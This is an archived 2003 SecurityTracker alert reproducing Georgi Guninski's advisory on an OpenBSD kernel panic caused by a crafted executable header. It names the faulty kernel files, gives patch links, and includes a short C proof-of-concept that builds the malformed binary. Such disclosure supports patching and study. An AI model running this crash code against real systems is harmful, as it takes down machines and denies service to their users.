SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   OpenBSD Kernel Vendors:   OpenBSD
OpenBSD Kernel Bug in Processing File Headers Lets Local Users Crash the System
SecurityTracker Alert ID:  1008099
SecurityTracker URL:  http://securitytracker.com/id/1008099
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 5 2003
Impact:   Denial of service via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.4 and prior versions
Description:   A denial of service vulnerability was reported in the OpenBSD kernel. A local user can trigger a kernel panic.

Georgi Guninski reported that a local user can execute a specially crafted binary on the target system to cause a kernel panic. OpenBSD indicated that an invalid header in the binary can trigger the flaw and that the flaw resides in 'ibcs2_exec.c' and 'exec_elf.c'.

Some demonstration exploit code is available at:

http://www.guninski.com/msuxobsd.c

Impact:   A local user can cause a kernel panic.
Solution:   OpenBSD has issued the following fixes:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/010_exec.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch

Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  OpenBSD kernel panic, yet still *BSD much better than windows


Georgi Guninski security advisory #63, 2003

OpenBSD kernel panic, yet still *BSD much better than windows

Systems affected:
tested on OpenBSD 3.3 and 2.8, probably other versions also affected


Risk: Low
Date: 4 November 2003

Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/msuxobsd1.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
By executing a specially crafted binary it is possible to cause kernel
panic on at least OpenBSD 3.3 and 2.8.

Details:
The problem seems in "ibcs2_exec.c" line 619 of 738 --83%-- col 1-8
	/* read in segment table */
	xs = (struct xseg *)malloc(xep->xe_segsize, M_TEMP, M_WAITOK);
	error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t)xs,

looks like malloc can return null.
Another potential problem is:
"exec_elf.c" line 792 of 827 --95%-- col 6-20
	np = (Elf_Note *)malloc(ph->p_filesz, M_TEMP, M_WAITOK);


The following code snippet demonstrates the problem:
------------------------------------
int main(int ac,char **av)
{
int fd;
struct xexec xp;
struct xext xep;
char exe[10];
char fil[]="./vvc";

fd=open(fil,O_CREAT|O_RDWR,0700);
if (fd==-1) {perror("open");return 1;}
memset(&xp,0,sizeof(xp));
memset(&xep,0,sizeof(xep));
memset(exe,'v',sizeof(exe));
xp.x_magic = XOUT_MAGIC;
xp.x_cpu = XC_386;
xp.x_renv = XE_EXEC;
xp.x_ext = sizeof(xep);
xep.xe_segsize = -1;
write(fd,&xp,sizeof(xp));
write(fd,&xep,sizeof(xep));
write(fd,exe,sizeof(exe));
printf("Now exec %s\n",fil);

}

------------------------------------

C proggie which demonstrates the problem is available at:
http://www.guninski.com/msuxobsd.c

Note: the openbsd's errata claims the header is invalid, though it is
believed the header to be valid and well formed.

Vendor status:
OpenBSD was notified on Mon, 3 Nov 2003 16:04:40 +0200.
Fix was available in CVS in less than 24 hours.
Fix available at http://www.openbsd.org/errata.html


Regards,
Georgi Guninski
http://www.guninski.com



----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC